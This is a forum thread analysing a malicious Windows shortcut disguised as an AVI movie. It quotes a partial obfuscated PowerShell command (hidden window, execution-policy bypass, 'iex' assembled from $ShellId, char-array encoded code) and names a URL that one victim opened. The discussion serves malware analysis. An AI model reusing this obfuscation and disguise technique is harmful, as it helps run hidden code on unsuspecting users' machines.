I downloaded a file which I almost didn't think twice over, but the target (of the shortcut) caught my eye:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP . ( $shelliD[1]+$SHeLlID[13]+'x') ([StrIng]::jOin( '',[CHar[]](36 ,97,115, 112 , 120,32 ,61,[omitting rest of code]
There's no doubt that something fishy is going on here. I understand the first three parameters, but what I couldn't quite figure out is how code of a payload like this would work in just a basic shortcut?
I got the same. The file looked like a AVI and I opened it quickly to check the quality of the movie. It was actually a well-disguised shortcut:
The target here translates to:
I opened
http://zvb.us/1
and it seems I have had some code run on my PC. At this point, I am not sure what has happened. No symptoms...My guess, it runs a Powershell with
Let's split this code up:
$ShellId
is a built-in Powershell variable:So
( $shelliD[1]+$SHeLlID[13]+'x')
transforms toiex
(=Invoke-Expression
)The rest of the code is
([StrIng]::jOin( '',[CHar[]](36 ,97,115, 112 , 120,32 ,61,[omitting rest of code]
. I gues the char array contains ascii characters. If so, we can transform it to:Summary:
So it invokes the code starting with
$aspx =
in a minimized Powershell window without warnings or prompts.Maybe the code ran through one of these obfuscation methods.
Hope that helps.